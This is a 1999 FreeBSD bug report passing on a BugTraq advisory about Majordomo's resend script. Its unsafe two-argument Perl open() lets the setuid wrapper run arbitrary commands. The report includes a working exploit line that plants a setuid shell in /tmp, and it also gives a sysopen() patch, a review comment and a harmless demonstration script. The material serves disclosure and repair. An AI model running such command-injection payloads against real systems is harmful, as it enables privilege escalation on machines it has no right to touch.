Date:      Wed, 29 Dec 1999 11:43:19 -0500 (EST)
From:      AnarCat@anarcat.dyndns.org
To:        FreeBSD-gnats-submit@freebsd.org
Subject:   ports/15768: Majordomo resend prog allow exec of any prog as majordomo user
Message-ID:  <19991229164319.78DC41BBD@anarcat.dyndns.org>


>Number:         15768
>Category:       ports
>Synopsis:       Majordomo resend prog allow exec of any prog as majordomo user
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    freebsd-ports
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          change-request
>Submitter-Id:   current-users
>Arrival-Date:   Wed Dec 29 11:40:01 PST 1999
>Closed-Date:
>Last-Modified:
>Originator:     AnarCat
>Release:        FreeBSD 3.4-STABLE i386
>Organization:
>Environment:

	Latest ports collection (dated 1999.12.28). Running 3.4-Stable.

	Should affect any system with latest ports collection.

>Description:

[From BugTraq, Brock Tellier, btellier@USA.NET]
	Majordomo features a wrapper that is suid root and then 
setuid(majordomo). It is used to exec various programs in the 
$PREFIX/majordomo dir. One of them is the resend Perl script which does
a 

	open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");

So this can be used to exec another program with the wrapper privileges.

>How-To-Repeat:

Our exploit is simple:

bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh
/tmp/xnec;chmod 6555 /tmp/xnec'
resend: must specify '-l list' at /usr/local/majordomo/resend line 77.

bash-2.02$ ls -la /tmp/xnec
-r-sr-sr-x    1 owner    daemon       361688 Dec 29 06:26 /tmp/xnec

In our case "owner" is majordomo. 

>Fix:
	
From BugTraq again, ("Todd C. Miller" <Todd.Miller@COURTESAN.COM>):

For those using perl 5.x, you can use sysopen() instead of the "magic"
perl open() to fix this.

 - todd

--- resend	Thu Aug 19 10:12:03 1999
+++ resend+	Tue Dec 28 23:55:39 1999
@@ -58,7 +58,7 @@
 if ($ARGV[0] =~ /^\@/) {
     $fn = shift(@ARGV);
     $fn =~ s/^@//;
-    open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");
+    sysopen(AV, $fn, O_RDONLY) || die("sysopen(AV, \"$fn\", O_RDONLY): $!\nStopped");
     undef($/);	# set input field separator
     $av = <AV>;	# read whole file into string
     close(AV);
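
Review bot: the replacement sysopen() line uses the O_RDONLY constant, but neither this hunk nor its context shows Fcntl being loaded; confirm that resend has "use Fcntl;" near the top, or add it in the same patch, so that O_RDONLY is the real constant and not an undefined bareword. Separately, $fn is still taken from $ARGV[0] with only the leading @ stripped, so the caller chooses which file is read with the wrapper's privileges; consider restricting it to the paths resend is expected to read.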

>Release-Note:
>Audit-Trail:
>Unformatted:
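
The difference between the two calls in the patch above, as an added example that is not part of the original report or of Majordomo: the same string is handed to two-argument open(), to sysopen() and to three-argument open(), and a marker file records whether a command was started. The temporary directory, the marker path and the harmless touch command are constructed for the demonstration; it assumes a Unix system with touch on the PATH.

```perl
#!/usr/bin/perl
# Added example with constructed input; not code from Majordomo or the PR.
use strict;
use warnings;
use Fcntl qw(O_RDONLY);
use File::Temp qw(tempdir);

my $dir    = tempdir(CLEANUP => 1);
my $marker = "$dir/marker";       # constructed: exists only if a command ran
my $fn     = "|touch $marker";    # constructed "filename" with a leading pipe

sub marker_state { return -e $marker ? "created" : "absent" }

# Before the fix: two-argument open() reads mode characters out of $fn
# itself, so a leading '|' makes Perl start the rest as a command.
if (open(my $old, $fn)) {
    close($old);                  # close() on a pipe waits for the child
}
print "2-arg open: marker ", marker_state(), "\n";
unlink $marker;

# After the fix: sysopen() hands $fn to open(2) unchanged, so the string
# can only ever be a path name, and this path does not exist.
if (sysopen(my $av, $fn, O_RDONLY)) {
    close($av);
} else {
    print "sysopen:    refused ($!)\n";
}
print "sysopen:    marker ", marker_state(), "\n";

# Three-argument open() gives the same guarantee with an explicit mode.
if (open(my $fh, '<', $fn)) {
    close($fh);
} else {
    print "3-arg open: refused ($!)\n";
}
print "3-arg open: marker ", marker_state(), "\n";
```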

